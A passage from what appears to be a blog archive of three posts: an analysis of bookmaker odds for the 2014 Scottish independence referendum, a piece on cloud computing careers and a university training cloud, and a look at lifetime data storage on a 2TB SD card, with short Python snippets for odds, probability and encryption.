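for price in ["1/1", "2/1", "1/2", "2/9", "3/1"]:
    print(f"{price:>4}: decimal {decimal_odds(price):.2f}, "
          f"implied {implied_probability(price):.0%}")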

Percentage share of the vote and turnout

Figure 2 outlines the decimal odds for the Yes vote share, and perhaps reflects the closeness of the vote, with a near Evens bet for a share between 45 and 50%, with 3.5 for 40% to 45% and 5.1 for 50% to 55%:

40% or less 6.8
40 to 45%    3.5
45 – 50%     2.1 (approx Evens).
50 – 55%     5.1

In terms of the turnout, the favourites are over 85% and between 80 and 85%:

Over 85%  2.62
80 – 85%    3
75 – 80%    3.5
70 – 75%    5.5
65 – 70%    17

Figure 2: Percentage share for Yes vote (17 Sept 2014)

The Trend

The trend for the last 30 days is shown in Figure 3. The key turn-around in the odds happened after 22 August, where the Yes vote odds were as high as 6.27. They generally slipped over the following weeks, hitting a plateau from around 7 Sept until 10 Sept 2014 (down to 2.78), rose back up to 4.39 over the next four days, and started to come back down over the past four days. The past day, though, has seen them rise again, perhaps reflecting the small lead in the polls for a No vote.

Figure 3: Yes odds for the past 30 days

Figure 4 shows the variation of the Yes vote odds over the past 30 days, and highlights the drift out of the Yes vote around 8 Sept 2014.

Figure 4: Yes Vote odds for 23 bookmakers over August 2014

Geographical trends

In terms of the place that is most likely to have the strongest Yes vote, Dundee has been out in front for many months, with current odds of 1.5 (1/2) of having the largest Yes vote, quite a long way in front of Clackmannanshire (5/1) and Glasgow (8/1). Table 1 outlines the Top 10 most likely to vote Yes (in terms of betting odds), and the Top 10 least likely to vote Yes. Of the areas which are the strongest, it is difficult to generalise, but the Highland areas and the West of Scotland are strongest, whereas the South of Scotland, the East of Scotland, and the Northern Isles are the least likely (based on the odds).

Overall the major population areas on the east coast of Scotland, apart from Dundee, are generally in the bottom half of the geographical split, with Edinburgh (23rd out of 32) and Aberdeen (19th out of 32):

  • Dundee (1st out of 32).
  • Glasgow (3rd out of 32).
  • Stirling (12th of 32).
  • Perth (17th out of 32).
  • Aberdeen (19th out of 32).
  • Inverness (22nd out of 32).
  • Edinburgh (23rd out of 32).

Table 1: Geographical split on most likely to have the strongest (and weakest) Yes vote

Top 10 most likely to vote Yes          Top 10 least likely to vote Yes
1. Dundee (most likely)                 23. Edinburgh
2. Clackmannanshire                     24. Renfrewshire
3. Glasgow                              25. East Lothian
4. Na h-Eileanan Siar                   26. Orkney
5. Angus                                27. Shetland
6. Moray                                28. Scottish Borders
7. East Ayrshire                        29. East Dunbartonshire
8. Falkirk                              30. East Renfrewshire
9. Aberdeenshire                        31. South Ayrshire
10. Highland                            32. Dumfries and Galloway (least likely)

The key changes

A key change took place around the 5 August debate, where the odds for a Yes vote had been dropping before the debate, but after it the average odds for a Yes vote moved steeply up (dropping one point in the days before the debate, and then rising 1.2 over the four days after it):

9 Aug 5.75
8 Aug 5.43
7 Aug 5.05
6 Aug 5.05
5 Aug 4.54
4 Aug 4.39
3 Aug 5.5

On the day before the second debate there was a peak in the Yes vote odds of 6.3 (22 August 2014), which has since fallen to nearly 4 (31 August 2014). The largest changes in the odds have thus occurred around the debates, with 5 August 2014 having 31 changes (where generally the No vote odds drifted out) and nine changes on 23 August 2014. Also, typically, there is an increasing rate of change of the odds as we move closer to the vote.

Conclusions

There is a strange dynamic going on in the betting market, as the polls are saying it is close, but the bookmakers are not reflecting that. Overall there is only one thing that really matters, and that is the vote tomorrow; opinion polls and bookmaker odds can only make a best guess at the generalised feeling of the nation. This vote may perhaps show a new dynamic, where it is difficult to gauge feelings purely by opinion polls or general sentiment. It has been a vote in which most of the printed media outlets have backed the No campaign, but, in these days of social media, they are not necessarily the main outlets for information.

Key observations:

  • Some bookmakers, especially the spread betting ones, make rapid changes in their odds, while others are static (with one bookmaker changing its odds once a month).
  • The largest number of changes in a single day, over the past five months, was 31 and occurred on 5 August 2014, which was the date of the debate between Alex Salmond and Alistair Darling.
  • Dundee, Glasgow and Clackmannanshire come out way in front as the places most likely to vote Yes, with Dumfries and Galloway the least likely.
  • The odds are erring on the side of a Yes vote from 45% to 50%.

One disappointing factor is that Betfair has already started to pay out on a No vote, as they reckon it is 78% certain (which is nowhere near a certainty). In fact, that is roughly the odds of not pulling the Ace of Spades from four cards, one of each ace: in one turn in four we will pull out the Ace of Spades. I do maths and not politics, but I do understand that 78% is nowhere near certain.
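
As a quick sanity check of that comparison (the 78% figure is Betfair’s; the card draw is the analogy above):

# Probability of NOT drawing the Ace of Spades in one draw from the four aces.
p_no_ace_of_spades = 1 - 1/4
print(p_no_ace_of_spades)   # 0.75, roughly the 78% that Betfair treated as near-certain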

Well only tomorrow will actually define what really has happened … the bookmakers and punters can only speculate.

Note: This is a non-political analysis, and is purely focused on analysing open-source data related to bookmaker odds. It is inspired by the usage of big data analysis, and how this identifies trends.

The Architects of the Future – Creating the Virtual Infrastructure for our Lives

Introduction

As we stand at the beginning of a new semester, our computer science students stand in a place to become the architects of the future. It is within the Internet and the Cloud that we are building a new World, one which does not differentiate by class or nationality, as it is completely inclusive for everyone in the World.

Few technologies have ever managed to make such an impact on our lives, and it is our new Computer Science students who will build these systems. In time, too, the Internet will improve our health and social care, and will deliver education to every single person, also providing everyone with a voice and a platform to showcase their talents (I appreciate that it can go the other way, and that it can provide a barrier to these things too, but our new architectures have the chance to improve things, and not see national or physical barriers getting in their way).

As students start their career in computing science, they must think clearly about their future, and position themselves to pick up the skills that are required to re-architect the most amazing infrastructure that mankind has ever created: the Internet, and within the Internet we are building the most amazing building ever: the Cloud. As part of this there are so many new rock-star careers being created to build it properly, including the great growth areas of Cloud Computing, Big Data, Cyber Security, and e-Health (Figure 1).

Figure 1: Four great careers of this new generation: Cloud Computing, Big Data, Cyber Security and e-Health

Changing landscape

We are in a phase of saying goodbye to the desktop PC, which has served us well for the last 30-odd years. The future, though, is to continue its legacy by building clustered computing environments, using heterogeneous servers, and to move away from stand-alone systems to ones which build into a generalised computing infrastructure.

This new infrastructure will allow our desktops to run within a cloud infrastructure, rather than on a physical computer. This has many advantages for companies, especially in updating desktops within their cloud, rather than on physical hosts.

So we are in a phase where we are re-architecting our information infrastructure, where we have moved through a phase of stand-alone computers (in the 1980s), onto hosts congregated around physical servers and gaining access to software components (DLLs), and now onto running our computing infrastructure in a centralised way, where we use terminals to access the resources (thin computing), and where applications are built by binding to Web services (Figure 2). This change is reflected in a new software architecture: SOA (Service-Oriented Architecture), where software applications are created by binding them to services which run in the Cloud.

Figure 2: Re-architecting

Hello Clustering

The demand for processing power and data storage are becoming key drivers, with the spend on servers increasing 6% over the past year (and over 4% in Q1 of 2014 alone). It is thought that 17% of this spend is for Big Data/Cloud applications. Overall the Intel x86 architecture has the lead, with nearly 80% of the market revenue. The growth in servers is also seen in an increase of 19% for Microsoft Windows and 15% growth for Linux.

HP (35.7%), Dell (15.1%) and Oracle (7%, gained from their acquisition of Sun Microsystems) all recorded increases of between 7 and 8%, while IBM (22.2%) saw their revenue drop by 15.5%, mainly due to them selling off their lower-end x86 server technology to Lenovo. Cisco Systems, while only holding 4.8% of the market, have shown a 63.1% increase in server turnover.

Advanced Teaching Cloud

To create the architects of the future, we need ways to support them, where they can learn in a safe environment, and where they can learn the limits of what is possible. We thus need new virtualised environments where students can learn about all of the elements that create these new buildings, and understand how to design, build and look after them.

At Edinburgh Napier, we’ve been building our own training cloud, as we have found that running virtualised infrastructures has many advantages, where we can create real-life information environments (Figures 3 and 4). These environments can range from fully-defined systems, which connect to the Internet, to ones which are fully sandboxed, where students can analyse how malware spreads and use advanced security tools.

Figure 3: Advantages of using the Cloud for training

Figure 4: DFET Virtual Training environment

Conclusions

What we are seeing at the current time is a re-architecting of information systems: from physical hosts congregated around physical servers, we are moving to the point where virtual hosts congregate around virtual servers, running in a Cloud infrastructure. This is a massive change, and it is the clustered servers which provide a resource for all the hosts and servers to share the same clustered environment, so that everything is controlled by software, and hardware does not limit any of the virtual hosts.

For those graduating, studying or entering computing science, there have never been such great opportunities, and it is to you that we look to rebuild this amazing infrastructure, and create something that has benefits for every person in the World. At one time knowledge was locked away within privileged cities and countries, but not any more: the Internet has enabled knowledge for all, no matter their background, location or financial status.

So there was fire … the wheel … the transistor … and Cloud Computing!

Your Whole Life on a Postage Stamp

Introduction

SanDisk have just created an SD card with 512 GB of memory, and it is expected that 2 TB will be achieved with the format. As someone who has over 1TB in both my Microsoft OneDrive and Dropbox, but only 8GB on my university account, it seems that my corporate storage systems are not keeping up with the latest trend in the scale-up of cloud-based storage. It should be remembered that security in the Cloud is not really an issue, as it is possible to store data in a cloud-based bucket and encrypt it. So while data storage capacity has increased 1000-fold over the last 10 years, my corporate storage has increased by a factor of eight.

Intel created the first DRAM (dynamic random-access memory) chip in 1971. It was named the 1103 and could hold 1 Kbit of data. DRAM chips are made up of small capacitors which are charged up with electrical charge (for a binary 1), or discharged (for a binary 0). As they use the charging and discharging of capacitors, they tend to be slower than the static version, SRAM (static random-access memory), which toggles the state of a pair of transistors. As SRAM needs more space than DRAM, DRAM has often been used to create larger memory storage chips than the equivalent SRAM ones. Both SRAM and DRAM lose their contents when the power is taken away (volatile memory), so storage systems use nonvolatile memory to preserve the data when the power is removed.

Life on a postage stamp

The IBM PC, released in 1981, could address only around 1MB of memory, and early PC hard disks held just tens of MB. Now we are looking at 2TB on a card the size of a postage stamp (where the area is mainly taken up with the physical layout of the card and connector). One of the key growth areas of computing is likely to be in-memory computing, where it is possible to store all the data you need locally in memory, and have no real need for connections to the Internet. With 2TB of data storage, you could probably hold all the data you are ever going to need.

So let’s look at Bob’s footprint over his 80 years on the planet:

  • Email. Bob sends 300 emails a day, and receives 400, each of around 1,000 characters (1KB), so that’s 700KB each day, and 255MB a year. Over 80 years this generates around 20GB of emails. Footprint: 1%.
  • Photos. Bob takes photos totalling around 1.5MB every day. That’s 547MB each year, and over 80 years it creates 43GB. Footprint: 2.15%.
  • Documents. Bob creates 10 documents each day, with an average of 1MB per document, which creates 3.6GB over a year, and 292GB over 80 years. Footprint: 14.6%.
  • Wikipedia. Bob loves Wikipedia, which takes around 10GB of space. Footprint: 0.5%.
  • Social media. Bob wants to save every post that he has made to Facebook, Twitter, and other social media sites. This is an average of 30MB of data each day, which gives 10.9GB of data each year, and 876GB of data over 80 years. Footprint: 43.8%.
  • Video. Bob takes videos totalling around 100MB each week. That’s 5.2GB each year, and 416GB over 80 years. Footprint: 20.8%.

So that is around 83% of the SD card used, and we have stored the whole of Bob’s life … every email, photo and media post … in fact everything, on something the size of a postage stamp.
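
The arithmetic above is simple enough to check with a short script. This is a minimal sketch, using the daily and weekly rates assumed in the list above, totalled against a 2TB card:

# Rough check of Bob's 80-year storage footprint against a 2TB SD card.
YEARS = 80
CARD_GB = 2000.0  # 2TB expressed in GB

daily_mb = {
    "Email": 0.7,          # 700 emails at around 1KB each
    "Photos": 1.5,
    "Documents": 10.0,
    "Social media": 30.0,
}
weekly_mb = {"Video": 100.0}
one_off_gb = {"Wikipedia": 10.0}

totals_gb = {k: v * 365 * YEARS / 1000 for k, v in daily_mb.items()}
totals_gb.update({k: v * 52 * YEARS / 1000 for k, v in weekly_mb.items()})
totals_gb.update(one_off_gb)

for name, gb in totals_gb.items():
    print(f"{name:12s} {gb:7.1f} GB  ({100 * gb / CARD_GB:4.1f}% of the card)")
print(f"{'Total':12s} {sum(totals_gb.values()):7.1f} GB  "
      f"({100 * sum(totals_gb.values()) / CARD_GB:4.1f}%)")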

Why don’t corporate systems keep up with the Cloud?

Corporations are still struggling with the Cloud, and with knowing how they should use public and private clouds, and how to create a single entity which keeps some things locally, but can burst into public cloud space (Figure 1). The problems with this scalability have continually been around performance, resilience, and security.

  • Security. Security can be solved by creating an encryption layer for all the data which leaves the corporate infrastructure and is then stored in a public cloud (a minimal sketch of this follows the list below).
  • Resilience. With resilience, the main cloud providers such as Amazon AWS and Microsoft Azure have shown near 100% up-time over the past few years, with very few problems with outages. The last major outage for Amazon Web Services (AWS) happened in August 2013, lasted nearly an hour, and was due to issues in their North Virginia datacenter. It mainly affected Amazon.com, but it also affected many companies who had built their own business in the Cloud, such as Vine and Instagram. It is estimated that Amazon lost as much as $1,100 in net sales per second (to put this into context, a five-minute outage in August 2013 cost Google $545,000).
  • Performance. Performance has always been an issue, especially where network connections are slow, or become busy over certain time periods. This issue is reducing as high-speed network connections provide fast response rates, especially where the content is placed at the edge of the public cloud.
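
A minimal sketch of such an encryption layer is shown below (using the Python cryptography library; key management and the actual upload are out of scope here):

# Sketch of an encryption layer applied before data leaves the corporate network.
# Key management and the actual cloud upload are out of scope for this illustration.
from cryptography.fernet import Fernet

key = Fernet.generate_key()        # in practice, held in the corporate key store
cipher = Fernet(key)

record = b"customer: Bob, card ending 1234"
blob = cipher.encrypt(record)      # only this ciphertext is sent to the public cloud

# The cloud provider stores an opaque blob; the company can still recover the data.
assert cipher.decrypt(blob) == record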

Figure 1: Public, private and hybrid clouds

Conclusions

Corporations are playing catch-up with the Cloud, and many are in the process of understanding how they can create a single Cloud infrastructure which integrates their private cloud infrastructure with a public one. In order to do this effectively they need to understand the issues around security, performance and resilience. When this is done, then perhaps I can get more than 8GB for my storage.

We now have the opportunity to store all the data that we need in-memory, with no need to store it in remote databases. Increasingly, applications may store all the data they need in memory, and avoid fetching it over relatively slow network connections.